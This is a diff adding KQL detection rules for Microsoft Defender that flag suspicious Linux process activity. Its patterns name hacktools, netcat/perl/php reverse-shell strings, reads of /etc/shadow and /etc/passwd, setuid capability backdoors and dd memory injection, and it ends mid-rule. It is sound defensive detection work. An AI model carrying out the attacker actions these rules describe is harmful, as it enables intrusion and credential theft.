new file mode 100644
index 00000000..4a14b737
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_hacktool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Linux HackTool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
+// Date: 2023-01-03
+// Level: high
+// Description: Detects known hacktool execution based on image name.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.resource-development, attack.t1587
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath contains "/cobaltstrike" or FolderPath contains "/teamserver") or (FolderPath endswith "/crackmapexec" or FolderPath endswith "/havoc" or FolderPath endswith "/merlin-agent" or FolderPath endswith "/merlinServer-Linux-x64" or FolderPath endswith "/msfconsole" or FolderPath endswith "/msfvenom" or FolderPath endswith "/ps-empire server" or FolderPath endswith "/ps-empire" or FolderPath endswith "/sliver-client" or FolderPath endswith "/sliver-server" or FolderPath endswith "/Villain.py") or (FolderPath endswith "/aircrack-ng" or FolderPath endswith "/bloodhound-python" or FolderPath endswith "/bpfdos" or FolderPath endswith "/ebpfki" or FolderPath endswith "/evil-winrm" or FolderPath endswith "/hashcat" or FolderPath endswith "/hoaxshell.py" or FolderPath endswith "/hydra" or FolderPath endswith "/john" or FolderPath endswith "/ncrack" or FolderPath endswith "/nxc-ubuntu-latest" or FolderPath endswith "/pidhide" or FolderPath endswith "/pspy32" or FolderPath endswith "/pspy32s" or FolderPath endswith "/pspy64" or FolderPath endswith "/pspy64s" or FolderPath endswith "/setoolkit" or FolderPath endswith "/sqlmap" or FolderPath endswith "/writeblocker") or FolderPath contains "/linpeas" or (FolderPath endswith "/autorecon" or FolderPath endswith "/httpx" or FolderPath endswith "/legion" or FolderPath endswith "/naabu" or FolderPath endswith "/netdiscover" or FolderPath endswith "/nuclei" or FolderPath endswith "/recon-ng") or FolderPath contains "/sniper" or (FolderPath endswith "/dirb" or FolderPath endswith "/dirbuster" or FolderPath endswith "/eyewitness" or FolderPath endswith "/feroxbuster" or FolderPath endswith "/ffuf" or FolderPath endswith "/gobuster" or FolderPath endswith "/wfuzz" or FolderPath endswith "/whatweb") or (FolderPath endswith "/joomscan" or FolderPath endswith "/nikto" or FolderPath endswith "/wpscan")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql b/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql
new file mode 100644
index 00000000..5862f1fe
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql
@@ -0,0 +1,12 @@
+// Title: Linux Network Service Scanning Tools Execution
+// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
+// Date: 2020-10-21
+// Level: low
+// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/socat") and (not((ProcessCommandLine contains " --listen " or ProcessCommandLine contains " -l ")))) or (FolderPath endswith "/autorecon" or FolderPath endswith "/hping" or FolderPath endswith "/hping2" or FolderPath endswith "/hping3" or FolderPath endswith "/naabu" or FolderPath endswith "/nmap" or FolderPath endswith "/nping" or FolderPath endswith "/telnet" or FolderPath endswith "/zenmap")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_package_uninstall.kql b/KQL/rules/linux/process_creation/linux_package_uninstall.kql
new file mode 100644
index 00000000..458dd45e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_package_uninstall.kql
@@ -0,0 +1,12 @@
+// Title: Linux Package Uninstall
+// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: low
+// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+//   - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "remove" or ProcessCommandLine contains "purge") and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--remove " or ProcessCommandLine contains " -r ") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains " -e " and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "erase" or ProcessCommandLine contains "remove") and FolderPath endswith "/yum")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_recon_indicators.kql b/KQL/rules/linux/process_creation/linux_recon_indicators.kql
new file mode 100644
index 00000000..9be5ce4f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_recon_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Recon Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events with patterns found in commands used for reconnaissance on linux systems
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -name .htpasswd" or ProcessCommandLine contains " -perm -4000 "
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql b/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql
new file mode 100644
index 00000000..512b68b4
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Linux Remote System Discovery
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-22
+// Level: low
+// Description: Detects the enumeration of other remote systems.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql
new file mode 100644
index 00000000..090fbbb5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql
@@ -0,0 +1,12 @@
+// Title: Linux Setgid Capability Set on a Binary via Setcap Utility
+// Author: Luc Génaux
+// Date: 2026-01-24
+// Level: low
+// Description: Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file.
+// This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).
+// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "cap_setgid" and FolderPath endswith "/setcap"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql
new file mode 100644
index 00000000..e8356003
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql
@@ -0,0 +1,12 @@
+// Title: Linux Setuid Capability Set on a Binary via Setcap Utility
+// Author: Luc Génaux
+// Date: 2026-01-24
+// Level: low
+// Description: Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file.
+// This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).
+// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "cap_setuid" and FolderPath endswith "/setcap"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql
new file mode 100644
index 00000000..33a42a90
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql
@@ -0,0 +1,12 @@
+// Title: Linux Shell Pipe to Shell
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+//   - Legitimate software that uses these patterns
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "sh -c " or ProcessCommandLine startswith "bash -c ") and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash" or ProcessCommandLine endswith " |sh"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql b/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql
new file mode 100644
index 00000000..b199634d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql
@@ -0,0 +1,15 @@
+// Title: Linux Sudo Chroot Execution
+// Author: Swachchhanda Shrawn Poudel (Nextron Systems)
+// Date: 2025-10-02
+// Level: low
+// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.
+// Attackers may use this technique to evade detection and execute commands in a modified environment.
+// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.
+// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068
+// False Positives:
+//   - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --chroot " or ProcessCommandLine contains "sudo -R ") and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_webshell_indicators.kql b/KQL/rules/linux/process_creation/linux_webshell_indicators.kql
new file mode 100644
index 00000000..87162cc1
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_webshell_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Webshell Indicators
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-10-15
+// Level: high
+// Description: Detects suspicious sub processes of web server processes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+//   - Web applications that invoke Linux command line tools
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "/httpd" or InitiatingProcessFolderPath endswith "/lighttpd" or InitiatingProcessFolderPath endswith "/nginx" or InitiatingProcessFolderPath endswith "/apache2" or InitiatingProcessFolderPath endswith "/node" or InitiatingProcessFolderPath endswith "/caddy") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "tomcat") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "websphere")) and (FolderPath endswith "/whoami" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/bin/uname" or FolderPath endswith "/bin/cat" or FolderPath endswith "/bin/crontab" or FolderPath endswith "/hostname" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/pwd" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql b/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql
new file mode 100644
index 00000000..ee1f4093
--- /dev/null
+++ b/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: Local Groups Discovery - Linux
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-10-11
+// Level: low
+// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/groups" or (ProcessCommandLine contains "/etc/group" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
new file mode 100644
index 00000000..d29fa812
--- /dev/null
+++ b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: Local System Accounts Discovery - Linux
+// Author: Alejandro Ortuno, oscd.community, CheraghiMilad
+// Date: 2020-10-08
+// Level: low
+// Description: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/lastlog" or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/etc/spwd.db" or ProcessCommandLine contains "/etc/pwd.db" or ProcessCommandLine contains "/etc/master.passwd") and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim" or FolderPath endswith "/less" or FolderPath endswith "/emacs" or FolderPath endswith "/sqlite3" or FolderPath endswith "/makemap")) or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql b/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql
new file mode 100644
index 00000000..f5056c4c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql
@@ -0,0 +1,14 @@
+// Title: Mask System Power Settings Via Systemctl
+// Author: Milad Cheraghi, Nasreddine Bencherchali
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
+// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
+// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.impact, attack.t1653
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "suspend.target" or ProcessCommandLine contains "hibernate.target" or ProcessCommandLine contains "hybrid-sleep.target") and (ProcessCommandLine contains " mask" and FolderPath endswith "/systemctl")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql b/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql
new file mode 100644
index 00000000..051b1a74
--- /dev/null
+++ b/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql
@@ -0,0 +1,10 @@
+// Title: Mount Execution With Hidepid Parameter
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-12
+// Level: medium
+// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.t1564
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "hidepid=2" and ProcessCommandLine contains " -o ") and FolderPath endswith "/mount"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql
new file mode 100644
index 00000000..bc0c6ea5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql
@@ -0,0 +1,10 @@
+// Title: Named Pipe Created Via Mkfifo
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: low
+// Description: Detects the creation of a new named pipe using the "mkfifo" utility
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "/mkfifo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/nohup_execution.kql b/KQL/rules/linux/process_creation/nohup_execution.kql
new file mode 100644
index 00000000..e2fa1204
--- /dev/null
+++ b/KQL/rules/linux/process_creation/nohup_execution.kql
@@ -0,0 +1,12 @@
+// Title: Nohup Execution
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-06
+// Level: medium
+// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+//   - Administrators or installed processes that leverage nohup
+
+DeviceProcessEvents
+| where FolderPath endswith "/nohup"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql b/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql
new file mode 100644
index 00000000..b1f77a44
--- /dev/null
+++ b/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql
@@ -0,0 +1,10 @@
+// Title: OS Architecture Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "aarch64" or ProcessCommandLine endswith "arm" or ProcessCommandLine endswith "i386" or ProcessCommandLine endswith "i686" or ProcessCommandLine endswith "mips" or ProcessCommandLine endswith "x86_64") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql b/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql
new file mode 100644
index 00000000..28e31d44
--- /dev/null
+++ b/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql
@@ -0,0 +1,11 @@
+// Title: Pnscan Binary Data Transmission Activity
+// Author: David Burkett (@signalblur)
+// Date: 2024-04-16
+// Level: medium
+// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
+// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|"|')"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql
new file mode 100644
index 00000000..8b394baf
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql
@@ -0,0 +1,13 @@
+// Title: Potential Container Discovery Via Inodes Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate system administrator usage of these commands
+//   - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " /" or ProcessCommandLine contains " / ") and FolderPath endswith "/ls" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}d|\\s--directory\\s)" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}i|\\s--inode\\s)"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql b/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql
new file mode 100644
index 00000000..7603ebc3
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql
@@ -0,0 +1,10 @@
+// Title: Potential Discovery Activity Using Find - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql
new file mode 100644
index 00000000..6e9c3014
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql
@@ -0,0 +1,10 @@
+// Title: Potential GobRAT File Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects the use of grep to discover specific files created by the GobRAT malware
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "apached" or ProcessCommandLine contains "frpc" or ProcessCommandLine contains "sshd.sh" or ProcessCommandLine contains "zone.arm") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql
new file mode 100644
index 00000000..6c7f97e0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Linux Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+//   - Legitimate activity of system administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "/amazon-ssm-agent"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql
new file mode 100644
index 00000000..448dc75f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql
@@ -0,0 +1,10 @@
+// Title: Potential Linux Process Code Injection Via DD Utility
+// Author: Joseph Kamau
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "of=" and ProcessCommandLine contains "/proc/" and ProcessCommandLine contains "/mem") and FolderPath endswith "/dd"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql
new file mode 100644
index 00000000..12da21c2
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Netcat Reverse Shell Execution
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-07
+// Level: high
+// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -e ") and (FolderPath endswith "/nc" or FolderPath endswith "/ncat") and (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh" or ProcessCommandLine contains "/bin/ash" or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/bsh" or ProcessCommandLine contains "/bin/csh" or ProcessCommandLine contains "/bin/ksh" or ProcessCommandLine contains "/bin/pdksh" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/tcsh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "$IFSash" or ProcessCommandLine contains "$IFSbash" or ProcessCommandLine contains "$IFSbsh" or ProcessCommandLine contains "$IFScsh" or ProcessCommandLine contains "$IFSksh" or ProcessCommandLine contains "$IFSpdksh" or ProcessCommandLine contains "$IFSsh" or ProcessCommandLine contains "$IFStcsh" or ProcessCommandLine contains "$IFSzsh")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql
new file mode 100644
index 00000000..5c8bb537
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Perl Reverse Shell Execution
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-07
+// Level: high
+// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "fdopen(" and ProcessCommandLine contains "::Socket::INET") or (ProcessCommandLine contains "Socket" and ProcessCommandLine contains "connect" and ProcessCommandLine contains "open" and ProcessCommandLine contains "exec")) and (ProcessCommandLine contains " -e " and FolderPath endswith "/perl")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql
new file mode 100644
index 00000000..a07b6c4a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql
@@ -0,0 +1,11 @@
+// Title: Potential PHP Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: high
+// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
+// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ash" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "bsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "pdksh" or ProcessCommandLine contains "sh" or ProcessCommandLine contains "tcsh" or ProcessCommandLine contains "zsh") and (ProcessCommandLine contains " -r " and ProcessCommandLine contains "fsockopen") and FolderPath contains "/php"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql
new file mode 100644
index 00000000..402db2cf
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ruby Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: medium
+// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
